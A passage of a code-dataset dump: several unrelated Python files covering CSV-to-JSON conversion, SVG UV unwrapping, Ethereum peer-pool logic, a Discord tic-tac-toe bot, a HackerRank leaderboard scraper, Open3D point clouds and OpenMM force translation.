'model_request/model_request_form.html', {'form': form, 'formset': formset})\n","repo_name":"Achekeev/CRM3","sub_path":"common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19761733367","text":"#!/usr/bin/python\n# James Tobat, 2014\nimport csv\nimport os\nimport re\nimport copy\n\nprogramName_template = \"DARPA Program Name\"\n# Parses a csv document in a mode (pub, project, program)\n# using a schema that it can attach JSON information to.\n# The end result is an array of JSON information which includes\n# the document title as well as all the JSON records identified\n# in the document (all use the schema passed in)\ndef parse_csv(document, mode, schema, template):\n JSON_Information = []\n \n if not template:\n document = os.path.basename(document)\n # Uses the name of the document given but replaces the file type\n # with JSON. This will be the name of the output file.\n doc_name = re.sub(\".csv\", \".json\", document, flags=re.I)\n JSON_Information.append(doc_name)\n # Identifies the DARPA Program by removing\n # the schema name from the file name e.g.\n # HACM-pubs would change to HACM.\n # Assumes the title of the document contains the \n # DARPA Program's name either in the form\n # DARPA_Program-schema_type.filetype e.g. HACM-pubs.csv\n # or is the name of the file itself e.g. 
PPAML.csv\n darpa_program = re.sub(\"-.*\",\"\",document)\n darpa_program = re.sub(\"\\..*\",\"\",darpa_program)\n schema['DARPA Program'] = darpa_program\n #print doc_name\n \n with open(document, 'r') as read_file:\n reader = csv.reader(read_file)\n # With the first row, checks the column titles given\n # in order to identify which column maps to which schema\n # item\n initial_row = True\n first_values = False\n team_index = -1\n title_index = -1\n link_index = -1\n project_index = -1\n category_index = -1\n code_index = -1\n home_index = -1\n description_index = -1\n license_index = -1\n\n template_fields = {} # stores row locations of JSON fields\n for row in reader:\n # Uses the schemas from the examples JSON file, this assumes\n # that the Excel columns have the same names as the JSON schema fields\n if template:\n # Checks if it one of the first rows\n if initial_row:\n # Checks to see if a header is present and ignores it\n header = re.search(\"Meta Data Fields\", row[0], flags=re.I)\n # If it isn't the header, assumes the next rows are data \n # for the JSON file\n if not header:\n initial_row = False\n k = 0\n first_values = True\n # Finds and stores the row index of each JSON field\n for column in row:\n template_fields[column] = k\n k += 1\n else:\n # This is only meant to be run once, as it finds the\n # DARPA Program Name and creates a file name from it\n # using the mode.\n darpa = \"\"\n if first_values:\n if mode == 'program':\n darpa = 'DARPA Program Name'\n else: \n darpa = 'DARPA Program'\n index = template_fields[programName_template]\n program_name = row[index].strip()\n schema[darpa] = program_name\n file_name = program_name + '-' + mode + '.json'\n JSON_Information.append(file_name)\n first_values = False\n \n schema_copy = copy.deepcopy(schema) # Ensures that no wrong values are kept\n # Goes through each JSON field in the schema and finds its corresponding value\n for key, value in schema.iteritems():\n # Ensures that the DARPA Program Name is kept and that fields that\n # aren't present in the spreadsheet aren't being read in.\n if key != darpa and key in template_fields:\n index = template_fields[key]\n # Splits Excel cells that have comma separated values\n # into a list then trims each value of excess whitespace\n item_list = row[index].split(',')\n if isinstance(schema[key], list):\n new_list = []\n for item in item_list:\n item = item.strip()\n if item.endswith('.'):\n item = item[:-1]\n new_list.append(item)\n\n schema_copy[key] = new_list\n else:\n # Simply stores the value in the schema\n # if it isn't a list.\n schema_copy[key] = row[index].strip()\n \n JSON_Information.append(schema_copy) \n else:\n if mode == \"pub\":\n if initial_row:\n initial_row = False\n i = 0\n # Maps the column titles to indices\n # which ensures that the script will\n # work even if the order changes\n for column in row:\n if column == \"Team\":\n team_index = i\n #print \"team %i\" % i\n if column == \"Title\":\n title_index = i\n #print \"title %i\" % i\n if column == \"Link\":\n link_index = i\n #print \"link %i\" % i\n i += 1\n else:\n #print row\n # Copies all relevant schema information\n # in a row to the JSON array.\n # Always uses a blank copy of the schema\n # to ensure that wrong information isn't \n # copied.\n record = copy.deepcopy(schema)\n record['Title'] = row[title_index]\n record['Program Teams']=[row[team_index]]\n record['Link'] = row[link_index]\n JSON_Information.append(record)\n\n if mode == \"project\":\n if initial_row:\n initial_row = False\n i = 0\n 
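                        # Header matching below is exact and case-sensitive:
                        # the spreadsheet's first row must contain columns
                        # named literally "Team", "Title" and "Link" for the
                        # corresponding indices to be set (they default to -1).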
# Maps the column titles to indices\n # which ensures that the script will\n # work even if the order changes\n for column in row:\n if column == \"Team\":\n team_index = i\n if column == \"Project\":\n project_index = i\n if column == \"Category\":\n category_index = i\n if column == \"Code\":\n code_index = i\n if column == \"Public Homepage\":\n home_index = i\n if column == \"Description\":\n description_index = i\n if column == \"License\":\n license_index = i\n i += 1\n else:\n # Copies all relevant schema information\n # in a row to the JSON array.\n # Always uses a blank copy of the schema\n # to ensure that wrong information isn't \n # copied.\n record = copy.deepcopy(schema)\n record['Software'] = row[project_index]\n record['Program Teams']=[row[team_index]]\n record['External Link'] = row[home_index]\n record['Public Code Repo'] = row[code_index]\n record['Description'] = row[description_index]\n record['License'] = [row[license_index]]\n \n # Assumes the catagories of a project are seperated\n # by slashes e.g. Cloud/Cybersecurity/Big Data.\n # Will also trim non-important white space.\n categories = row[category_index].split('/')\n for j in xrange(len(categories)):\n category = categories[j]\n categories[j] = category.strip()\n record['Categories'] = categories\n\n JSON_Information.append(record)\n\n return JSON_Information\n\n","repo_name":"ericwhyne/open-catalog-generator","sub_path":"transforms/csv_to_JSON.py","file_name":"csv_to_JSON.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"42368364250","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef main(argv):\n\tif len(argv) < 3:\n\t\tprint(\"Usage: %s input.obj output.svg\" % argv[0])\n\t\treturn\n\tinput_filename = argv[1]\n\toutput_filename = argv[2]\n\n\ttex_coords = []\n\twith open(input_filename, \"r\", encoding=\"utf-8\") as inp:\n\t\twith open(output_filename, \"w\") as out:\n\t\t\tw = 1024\n\t\t\th = 1024\n\t\t\t\n\t\t\tout.write(\"\\n\" % (w, h))\n\t\t\tfor line in inp:\n\t\t\t\tparts = line.split(\"#\")[0].strip().split(\" \")\n\t\t\t\tif parts[0] == \"vt\":\n\t\t\t\t\ttex_coords.append((float(parts[1]), float(parts[2])))\n\t\t\t\telif parts[0] == \"f\":\n\t\t\t\t\tpoints = []\n\t\t\t\t\tfor part in parts[1:]:\n\t\t\t\t\t\tparts2 = part.split(\"/\")\n\t\t\t\t\t\ttex_coord = tex_coords[int(parts2[1]) - 1]\n\t\t\t\t\t\tx = tex_coord[0] * w\n\t\t\t\t\t\ty = h - tex_coord[1] * h - 1\n\t\t\t\t\t\tpoints.append((x, y))\n\t\t\t\t\tout.write(\n\t\t\t\t\t\t\"\\t\\n\" %\n\t\t\t\t\t\t\" \".join(map(lambda point: \",\".join(map(str, point)), points))\n\t\t\t\t\t)\n\t\t\t\n\t\t\tout.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","repo_name":"maumyrtille/VoxelGameClient","sub_path":"scripts/make_unwrap.py","file_name":"make_unwrap.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71344095128","text":"from abc import abstractmethod\nimport asyncio\nimport functools\nimport operator\nimport random\nfrom typing import (\n Container,\n Dict,\n List,\n Tuple,\n Type,\n Union,\n)\n\nfrom cached_property import cached_property\n\nfrom lahja import EndpointAPI\n\nfrom cancel_token import CancelToken, OperationCancelled\n\nfrom eth_utils.logging import get_extended_debug_logger\nfrom eth_utils.toolz import (\n excepts,\n groupby,\n)\n\nfrom eth_typing import BlockNumber, Hash32\n\nfrom eth.abc import 
VirtualMachineAPI\nfrom eth.constants import GENESIS_BLOCK_NUMBER\nfrom eth.rlp.headers import BlockHeader\n\nfrom p2p.abc import BehaviorAPI, NodeAPI, SessionAPI\nfrom p2p.constants import (\n MAX_SEQUENTIAL_PEER_CONNECT,\n PEER_CONNECT_INTERVAL,\n)\nfrom p2p.disconnect import DisconnectReason\nfrom p2p.typing import NodeID\nfrom p2p.exceptions import (\n MalformedMessage,\n NoConnectedPeers,\n PeerConnectionLost,\n UnknownAPI,\n)\nfrom p2p.peer import (\n BasePeer,\n BasePeerFactory,\n)\nfrom p2p.peer_backend import (\n BasePeerBackend,\n)\nfrom p2p.peer_pool import (\n BasePeerPool,\n)\nfrom p2p.service import BaseService\nfrom p2p.token_bucket import TokenBucket\nfrom p2p.tracking.connection import (\n BaseConnectionTracker,\n NoopConnectionTracker,\n)\n\nfrom trinity.constants import TO_NETWORKING_BROADCAST_CONFIG\nfrom trinity.exceptions import BaseForkIDValidationError, ENRMissingForkID\nfrom trinity.protocol.common.abc import ChainInfoAPI, HeadInfoAPI\nfrom trinity.protocol.common.api import ChainInfo, HeadInfo, choose_eth_or_les_api\nfrom trinity.protocol.eth.api import ETHV63API, ETHAPI\nfrom trinity.protocol.eth.forkid import (\n extract_fork_blocks,\n extract_forkid,\n validate_forkid,\n)\nfrom trinity.protocol.les.api import LESV1API, LESV2API\n\nfrom trinity.components.builtin.network_db.connection.tracker import ConnectionTrackerClient\nfrom trinity.components.builtin.network_db.eth1_peer_db.tracker import (\n BaseEth1PeerTracker,\n EventBusEth1PeerTracker,\n NoopEth1PeerTracker,\n)\n\nfrom .boot import DAOCheckBootManager\nfrom .context import ChainContext\nfrom .events import (\n DisconnectPeerEvent,\n)\n\n\np2p_logger = get_extended_debug_logger('p2p')\n\n\nclass BaseChainPeer(BasePeer):\n boot_manager_class = DAOCheckBootManager\n context: ChainContext\n\n @cached_property\n def chain_api(self) -> Union[ETHAPI, ETHV63API, LESV1API, LESV2API]:\n return choose_eth_or_les_api(self.connection)\n\n @cached_property\n def head_info(self) -> HeadInfoAPI:\n return self.connection.get_logic(HeadInfo.name, HeadInfo)\n\n @cached_property\n def chain_info(self) -> ChainInfoAPI:\n return self.connection.get_logic(ChainInfo.name, ChainInfo)\n\n def get_behaviors(self) -> Tuple[BehaviorAPI, ...]:\n return (\n HeadInfo().as_behavior(),\n ChainInfo().as_behavior(),\n )\n\n @property\n @abstractmethod\n def max_headers_fetch(self) -> int:\n ...\n\n def setup_connection_tracker(self) -> BaseConnectionTracker:\n if self.has_event_bus:\n return ConnectionTrackerClient(self.get_event_bus())\n else:\n self.logger.warning(\n \"No event_bus set on peer. 
Connection tracking falling back to \"\n \"`NoopConnectionTracker`.\"\n )\n return NoopConnectionTracker()\n\n\nclass BaseProxyPeer(BaseService):\n \"\"\"\n Base class for peers that can be used from any process where the actual peer is not available.\n \"\"\"\n\n def __init__(self,\n session: SessionAPI,\n event_bus: EndpointAPI,\n token: CancelToken = None):\n\n self.event_bus = event_bus\n self.session = session\n super().__init__(token)\n\n def __str__(self) -> str:\n return f\"{self.__class__.__name__} {self.session}\"\n\n async def _run(self) -> None:\n self.logger.debug(\"Starting Proxy Peer %s\", self)\n await self.cancellation()\n\n async def disconnect(self, reason: DisconnectReason) -> None:\n self.logger.debug(\"Forwarding `disconnect()` call from proxy to actual peer: %s\", self)\n await self.event_bus.broadcast(\n DisconnectPeerEvent(self.session, reason),\n TO_NETWORKING_BROADCAST_CONFIG,\n )\n await self.cancel()\n\n\nclass BaseChainPeerFactory(BasePeerFactory):\n context: ChainContext\n peer_class: Type[BaseChainPeer]\n\n\nclass BaseChainPeerPool(BasePeerPool):\n context: ChainContext\n connected_nodes: Dict[NodeAPI, BaseChainPeer] # type: ignore\n peer_factory_class: Type[BaseChainPeerFactory]\n peer_tracker: BaseEth1PeerTracker\n\n async def maybe_connect_more_peers(self) -> None:\n rate_limiter = TokenBucket(\n rate=1 / PEER_CONNECT_INTERVAL,\n capacity=MAX_SEQUENTIAL_PEER_CONNECT,\n )\n\n # We set this to 0 so that upon startup (when our RoutingTable will have only a few\n # entries) we use the less restrictive filter function and get as many connection\n # candidates as possible.\n last_candidates_count = 0\n while self.is_operational:\n if self.is_full:\n await self.sleep(PEER_CONNECT_INTERVAL)\n continue\n\n await self.wait(rate_limiter.take())\n\n if last_candidates_count >= self.available_slots:\n head = await self.get_chain_head()\n genesis_hash = await self.get_genesis_hash()\n fork_blocks = extract_fork_blocks(self.vm_configuration)\n should_skip = functools.partial(\n skip_candidate_if_on_list_or_fork_mismatch,\n genesis_hash,\n head.block_number,\n fork_blocks,\n )\n else:\n self.logger.debug(\n \"Didn't get enough candidates last time, falling back to skipping \"\n \"only peers that are blacklisted or already connected to\")\n should_skip = skip_candidate_if_on_list # type: ignore\n\n try:\n candidate_counts = await asyncio.gather(*(\n self._add_peers_from_backend(backend, should_skip)\n for backend in self.peer_backends\n ))\n last_candidates_count = sum(candidate_counts)\n except OperationCancelled:\n break\n except asyncio.CancelledError:\n # no need to log this exception, this is expected\n raise\n except Exception:\n self.logger.exception(\"unexpected error during peer connection\")\n # Continue trying to connect to peers, even if there was a\n # surprising failure during one of the attempts.\n continue\n\n @property\n def vm_configuration(self) -> Tuple[Tuple[BlockNumber, Type[VirtualMachineAPI]], ...]:\n return self.context.vm_configuration\n\n async def get_chain_head(self) -> BlockHeader:\n return await self.wait(self.context.headerdb.coro_get_canonical_head())\n\n async def get_genesis_hash(self) -> Hash32:\n return await self.wait(\n self.context.headerdb.coro_get_canonical_block_hash(BlockNumber(GENESIS_BLOCK_NUMBER))\n )\n\n @property\n def highest_td_peer(self) -> BaseChainPeer:\n peers = tuple(self.connected_nodes.values())\n if not peers:\n raise NoConnectedPeers(\"No connected peers\")\n\n td_getter = excepts(\n (PeerConnectionLost, 
UnknownAPI),\n operator.attrgetter('head_info.head_td'),\n lambda _: 0,\n )\n peers_by_td = groupby(td_getter, peers)\n max_td = max(peers_by_td.keys())\n return random.choice(peers_by_td[max_td])\n\n def get_peers(self, min_td: int) -> List[BaseChainPeer]:\n # TODO: Consider turning this into a method that returns an AsyncIterator, to make it\n # harder for callsites to get a list of peers while making blocking calls, as those peers\n # might disconnect in the meantime.\n peers = tuple(self.connected_nodes.values())\n return [peer for peer in peers if peer.head_info.head_td >= min_td]\n\n def setup_connection_tracker(self) -> BaseConnectionTracker:\n if self.has_event_bus:\n return ConnectionTrackerClient(self.get_event_bus())\n else:\n return NoopConnectionTracker()\n\n def setup_peer_backends(self) -> Tuple[BasePeerBackend, ...]:\n if self.has_event_bus:\n self.peer_tracker = EventBusEth1PeerTracker(self.get_event_bus())\n else:\n self.peer_tracker = NoopEth1PeerTracker()\n\n self.subscribe(self.peer_tracker)\n return super().setup_peer_backends() + (self.peer_tracker,)\n\n\ndef skip_candidate_if_on_list(skip_list: Container[NodeID], candidate: NodeAPI) -> bool:\n # This shouldn't happen as we don't keep ENRs with no endpoint information, but we check it\n # here just in case.\n if candidate.address is None:\n p2p_logger.warning(\"Skipping connection candidate with no endpoint info: %s\", candidate)\n return True\n if candidate.id in skip_list:\n p2p_logger.debug2(\"Skipping connection candidate (%s) as it's on skip list\", candidate)\n return True\n return False\n\n\ndef skip_candidate_if_on_list_or_fork_mismatch(\n genesis_hash: Hash32,\n head: BlockNumber,\n fork_blocks: Tuple[BlockNumber, ...],\n skip_list: Container[NodeID],\n candidate: NodeAPI) -> bool:\n if skip_candidate_if_on_list(skip_list, candidate):\n return True\n\n # For now we accept candidates which don't specify a ForkID in their ENR, but we may want to\n # change that if we realize we're getting too many chain-mismatch errors when connecting.\n try:\n candidate_forkid = extract_forkid(candidate.enr)\n except ENRMissingForkID:\n p2p_logger.debug(\"Accepting connection candidate (%s) with no ForkID\", candidate)\n return False\n except MalformedMessage as e:\n # Logging as a warning just in case there's a bug in our code that fails to deserialize\n # valid ForkIDs. 
If this becomes too noisy, we should consider reducing the severity.\n        p2p_logger.warning(\n            \"Unable to extract ForkID from ENR of %s (%s), accepting as connection candidate \"\n            \"anyway\",\n            candidate,\n            e,\n        )\n        return False\n\n    try:\n        validate_forkid(candidate_forkid, genesis_hash, head, fork_blocks)\n    except BaseForkIDValidationError as e:\n        p2p_logger.debug(\"Skipping forkid-incompatible connection candidate (%s): %s\", candidate, e)\n        return True\n\n    p2p_logger.debug(\"Accepting forkid-compatible connection candidate (%s)\", candidate)\n    return False\n","repo_name":"AYCH-Inc/aych.eth.client","sub_path":"trinity/protocol/common/peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":10799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"5090059019","text":"import re\n\nfrom discord.ext import commands\nfrom helpers.tic_tac_toe.tic_tac_toe_game import TicTacToeGame\nfrom helpers import ask_for_acceptance\n\n\nclass TicTacToe(commands.Cog):\n    \"\"\"\n    Play Tic-Tac-Toe against another discord user or against the computer with three difficulties:\n    - easy\n    - difficult\n    - impossible\n    \"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command(\n        name=\"ttt\",\n        help=\"\"\"\n            Available difficulties:\n            - easy\n            - difficult\n            - impossible\n            \"\"\",\n        aliases=[\"play_tic_tac_toe\"],\n    )\n    async def play_tic_tac_toe(self, ctx, difficulty: str) -> None:\n        \"\"\"\n        play a Tic-Tac-Toe game against the computer\n\n        :param difficulty: CPU difficulty\n        :type difficulty: str\n        \"\"\"\n        if difficulty.lower() not in [\"easy\", \"difficult\", \"impossible\"]:\n            await ctx.send(\"Unavailable difficulty\")\n            return\n        game = TicTacToeGame(\"X\", \"O\", TicTacToeGame.PLAYER, difficulty)\n        while not game.check_game_over():\n            await ctx.send(game.to_string(True))\n            await ctx.send(\"Where do you want to go?\")\n            move = await self.bot.wait_for(\n                \"message\", check=lambda message: message.author == ctx.author\n            )\n            if move.content.strip().lower() == \"exit\":\n                await ctx.send(\"Exiting...\")\n                return\n            try:\n                move = int(move.content.strip().lower())\n            except ValueError:\n                await ctx.send(\"This doesn't look like a number\")\n                continue\n            if move not in game.possible_moves():\n                await ctx.send(\"You can't choose field \" + str(move))\n                continue\n            game.make_move(move)\n            if game.check_game_over():\n                break\n            await ctx.send(game.to_string())\n            ai_move = game.get_ai_move()\n            await ctx.send(\"I choose \" + str(ai_move))\n            game.make_move(ai_move)\n        winner = game.get_winner()\n        await ctx.send(game.to_string())\n        if winner == game.PLAYER:\n            await ctx.send(\"You won! Congratulations!\")\n        elif winner == game.COMPUTER:\n            await ctx.send(\"I won! Better luck next time!\")\n        else:\n            await ctx.send(\"It's a Draw! Wanna play again?\")\n\n    @commands.command(\n        name=\"ttt_multi\",\n        help=\"\"\"\n            Play Tic-Tac-Toe against someone on your discord server!\n            Simply ttt_multi and mention player2\n            \"\"\",\n        aliases=[\"play_tic_tac_toe_multiplayer\"],\n    )\n    async def play_tic_tac_toe_multiplayer(self, ctx, opponent) -> None:\n        \"\"\"\n        play Tic-Tac-Toe against another player\n\n        :param opponent: other player\n        :type opponent: discord.Member\n        \"\"\"\n        challenger = ctx.author\n        opponent = ctx.guild.get_member(int(re.sub(\"[^0-9]\", \"\", opponent)))\n        invite = (\n            opponent.mention\n            + \"! \"\n            + challenger.mention\n            + \" is inviting you to a game of Tic-Tac-Toe. 
Accept?\"\n        )\n        if await ask_for_acceptance.ask(invite, opponent, ctx.channel, self.bot):\n            await ctx.send(\n                \"An epic Tic-Tac-Toe Duel is about to start between \"\n                + challenger.mention\n                + \" and \"\n                + opponent.mention\n            )\n        else:\n            await ctx.send(\n                \"Hey \"\n                + challenger.mention\n                + \"! I am sad to inform you \"\n                + opponent.mention\n                + \" hasn't accepted the invite\"\n            )\n            return\n        active_player = opponent\n        game = TicTacToeGame(\"X\", \"O\", TicTacToeGame.PLAYER, \"\")\n        while not game.check_game_over():\n            await ctx.send(\"It is \" + active_player.mention + \"'s turn!\")\n            await ctx.send(game.to_string(including_number_grid=True))\n            move = await self.bot.wait_for(\n                \"message\", check=lambda message: message.author == active_player\n            )\n            if move.content.strip().lower() == \"exit\":\n                await ctx.send(active_player.mention + \" gave up!\")\n                return\n            try:\n                move = int(move.content.strip().lower())\n            except ValueError:\n                await ctx.send(\"This doesn't look like a number\")\n                continue\n            if move not in game.possible_moves():\n                await ctx.send(\"You can't choose field \" + str(move))\n                continue\n            game.make_move(move)\n            active_player = opponent if active_player == challenger else challenger\n        winner = game.get_winner()\n        await ctx.send(game.to_string())\n        if winner == game.PLAYER:\n            await ctx.send(opponent.mention + \" won against \" + challenger.mention)\n        elif winner == game.COMPUTER:\n            await ctx.send(challenger.mention + \" won against \" + opponent.mention)\n        else:\n            await ctx.send(\n                \"It's a draw between \" + challenger.mention + \" and \" + opponent.mention\n            )\n\n\ndef setup(bot):\n    bot.add_cog(TicTacToe(bot))\n","repo_name":"sneks-sus/Novell","sub_path":"cogs/games/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"}
{"seq_id":"27100887268","text":"import requests,math\nfrom .generic_engine import GenericEngine\nfrom .generic_driver import GenericDriver\n\n\"\"\"\nPer a study of HackerRank, scraping the leaderboard by submission time is not\nreliable, so filtering by college is mandatory; HackerRank support is therefore\nonly added for the supported colleges.\n\"\"\"\nclass HackerRankEngine(GenericEngine):\n    def __init__(self, question_url, key_users, schools):\n        super().__init__(question_url,key_users)\n        self.schools = schools\n        self.config = {\n            \"students_per_request\":100\n        }\n\n    def generate_request_url(self, **kwargs):\n        rest_url = self.base_url.replace(\"hackerrank.com/\", \"hackerrank.com/rest/contests/master/\")\n        kwargs['school'] = kwargs['school'].replace(\" \", \"%20\")\n        current_rest_url = rest_url + \"/filter?offset={off_set}&limit={limit}&&include_practice=true&filter_kinds=school&school={school}\"\n        students_per_request = self.config[\"students_per_request\"]\n        return current_rest_url.format(off_set=(kwargs.get('pg_id',0)*students_per_request),limit=((kwargs.get('pg_id',0)+1)*students_per_request),school=kwargs.get('school'))\n\n    def get_page_data(self, url):\n        while True:\n            try:\n                response = requests.get(url)\n            except Exception as e:\n                continue\n            break\n        data = response.json()\n        return data\n\n    def get_pages_count(self, page_data):\n        students_per_request = self.config[\"students_per_request\"]\n        return math.ceil(page_data['total'] / students_per_request)\n\n    def get_users_from_page(self, page_data):\n        result_li = []\n        for x in page_data['models']:\n            if x['score'] != 0 and x['hacker'] in self.key_users:\n                
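# keep only hackers who actually scored on this challenge and who also\n                # appear in the tracked key_users list; everyone else on the page is ignored\n                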
result_li.append(x['hacker'])\n return result_li\n\n def update_matching_list(self, users_li):\n self.result_users.update(users_li)\n\n def scrap_the_question_for_school(self, school):\n initial_url = self.generate_request_url(school=school)\n page_data = self.get_page_data(initial_url)\n pages_count = self.get_pages_count(page_data)\n pg = 1\n while True:\n page_users = self.get_users_from_page(page_data)\n self.update_matching_list(page_users)\n if (pg >= pages_count):\n break\n url = self.generate_request_url(pg_id=pg, school=school)\n page_data = self.get_page_data(url)\n pg += 1\n\n def scrap_the_question(self,):\n for school in self.schools:\n self.scrap_the_question_for_school(school)\n return self.get_results()\n\nclass HackerRankDriver(GenericDriver):\n def __init__(self, question_url, given_users, schools):\n if schools == None:\n raise Exception(\"Hackerrank requires schools for scraping of the results\")\n leaderboard_url = question_url.replace('/problem', '/leaderboard')\n super().__init__(leaderboard_url , given_users, HackerRankEngine(leaderboard_url, given_users, schools))\n\n def get_results(self,):\n return self.engine.scrap_the_question()\n\n\ndef tester():\n question ='https://www.hackerrank.com/challenges/a-very-big-sum/problem'\n users = [\"13PA1A05A4\", \"VinayV9\"]\n hd = HackerRankDriver(question, users, ['Vishnu Institute Of Technology'])\n print(hd.get_results())\n\ntester()\n","repo_name":"saikishan/cap_report_generator","sub_path":"scraper/scraper/platforms/hackerrank.py","file_name":"hackerrank.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39168321329","text":"import cv2\r\nimport open3d as o3d\r\nimport numpy as np \r\nimport pathlib\r\n\r\n\r\n\r\ndef scale_point_cloud(pcd, scale_factor):\r\n pcd_scaled = pcd # Create a copy of the original point cloud\r\n\r\n # Scale the X, Y, and Z coordinates of each point by the scale_factor\r\n pcd_scaled.points = o3d.utility.Vector3dVector(np.asarray(pcd.points) * scale_factor)\r\n\r\n return pcd_scaled\r\n\r\ndef create_point_cloud_blender(rgb_file, depth_file, intrinsic, extrinsic):\r\n\r\n file_extension=pathlib.Path(depth_file).suffix\r\n print(file_extension)\r\n if file_extension==\".npz\":\r\n with np.load(depth_file) as depth_npz:\r\n depthimg = depth_npz['depth']\r\n \r\n else:\r\n with open(depth_file, 'rb') as f:\r\n depthimg = np.load(f)\r\n depth_map = depthimg.copy()\r\n depth_map = np.float32(depth_map)\r\n\r\n rgbImg = cv2.imread(rgb_file)\r\n rgbImg = cv2.cvtColor(rgbImg, cv2.COLOR_RGB2BGR)\r\n\r\n color_ = o3d.geometry.Image(rgbImg)\r\n depth_ = o3d.geometry.Image(depth_map)\r\n\r\n rgbd_image = o3d.geometry.RGBDImage.create_from_color_and_depth(\r\n color_, depth_, depth_scale=3.0, depth_trunc=3.00000, convert_rgb_to_intensity=False)\r\n\r\n extrinsic = np.asarray(np.loadtxt(extrinsic, dtype=np.float64))\r\n camera_intrinsic_mat = np.asarray(np.loadtxt(intrinsic, dtype=np.float64))\r\n\r\n # Convert intrinsic matrix to PinholeCameraIntrinsic\r\n intrinsic = o3d.camera.PinholeCameraIntrinsic(1280, 720, camera_intrinsic_mat[0][0], camera_intrinsic_mat[1][1], camera_intrinsic_mat[0][2], camera_intrinsic_mat[1][2])\r\n pcd = o3d.geometry.PointCloud.create_from_rgbd_image(rgbd_image, intrinsic, extrinsic)\r\n pcd.transform([[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]])\r\n\r\n R = pcd.get_rotation_matrix_from_xyz((np.pi * 0.5, np.pi * 1.5, 0))\r\n pcd = pcd.rotate(R, center=(0, 0, 
0))\r\n print(camera_intrinsic_mat)\r\n\r\n # Scale the point cloud as the original\r\n scale_factor = 5.0\r\n pcd_scaled = scale_point_cloud(pcd, scale_factor)\r\n\r\n o3d.visualization.draw_geometries([pcd_scaled])\r\n return pcd\r\n\r\n\r\nrgb_file_path=\"rgb_images/rgb_0001.png\"\r\n\r\ndepth_file_path=\"depth_array_unresized_npy/depth_0001.npy\"\r\n\r\n\r\ncamera_extrinsic_path = \"living_room_folder/camera_extrinsic0.txt\"\r\ncamera_intrinsic_path = \"living_room_folder/camera_intrinsic.txt\"\r\n\r\npoint_cloud = create_point_cloud_blender(rgb_file_path, depth_file_path, camera_intrinsic_path, camera_extrinsic_path)\r\n\r\n\r\nfile_path=f\"point_cloud_depth_resized_0003.ply\"\r\no3d.io.write_point_cloud(file_path,point_cloud)","repo_name":"nileshpccoe/point_cloud_creation","sub_path":"rgbd2pcd.py","file_name":"rgbd2pcd.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29322679233","text":"import openmm\nfrom openmm import app, unit\nimport numpy as np\nimport copy\nfrom typing import Any, Tuple, Dict, Iterable, Callable\nfrom aludel.utils import maybe_params_as_unitless, sort_indices_to_str\n\n# utilities\n\ndef make_exception_param_from_particles(_force_to_query, particles):\n p1_particle_params = maybe_params_as_unitless(_force_to_query.getParticleParameters(particles[0]))\n p2_particle_params = maybe_params_as_unitless(_force_to_query.getParticleParameters(particles[1]))\n cp = p1_particle_params[0] * p2_particle_params[0]\n s = (p1_particle_params[1] + p2_particle_params[1])/2.\n e = np.sqrt(p1_particle_params[2]*p2_particle_params[2])\n return cp, s, e\n\ndef translate_standard_valence_force_to_custom(\n old_force: openmm.Force, # old valence force\n new_force: openmm.Force, # new valence force\n old_to_hybrid_map: Iterable[int],\n new_to_hybrid_map: Iterable[int],\n unique_old_atoms: Iterable[int],\n unique_new_atoms: Iterable[int],\n force_utils: Dict[str, Any],\n custom_expression: str,\n global_parameters: Dict[str, float],\n static_del: Iterable[int] = [1, 0, 0, 0, 0],\n old_del: Iterable[int] = [0, 1, 0, 0, 0],\n new_del: Iterable[int] = [0, 0, 1, 0, 0],\n unique_old_del: Iterable[int] = [0, 0, 0, 1, 0],\n unique_new_del: Iterable[int] = [0, 0, 0, 0, 1],\n **kwargs) -> openmm.Force:\n \"\"\"\n translate a standard valence force\"\"\"\n num_particles = force_utils['num_particles']\n\n # make the custom valence force and add per term params\n custom_expression = custom_expression + force_utils['U_valence']\n U_out = force_utils['custom_force'](custom_expression)\n is_periodic = old_force.usesPeriodicBoundaryConditions()\n _ = U_out.setUsesPeriodicBoundaryConditions(is_periodic)\n for gp_name, gp_val in global_parameters.items(): # add per particle params\n U_out.addGlobalParameter(gp_name, gp_val)\n\n add_per_term_param_fn = getattr(U_out, force_utils['add_per_term_param'])\n for _term in force_utils['per_term_params']:\n _ = add_per_term_param_fn(_term)\n\n # get the setTerm/addTerm/query methods\n term_adder_fn = getattr(U_out, force_utils['addTerm'])\n term_setter_fn = getattr(U_out, force_utils['setTerm'])\n query_U_out_by_idx_fn = getattr(U_out, force_utils['query_params'])\n\n hybr_idx_to_term_dict = {} # record dict of added terms\n for force in [old_force, new_force]:\n query_term_by_idx_fn = getattr(force, force_utils['query_params'])\n num_terms = getattr(force, force_utils['query_num_terms'])()\n uniques = unique_old_atoms if force == old_force else 
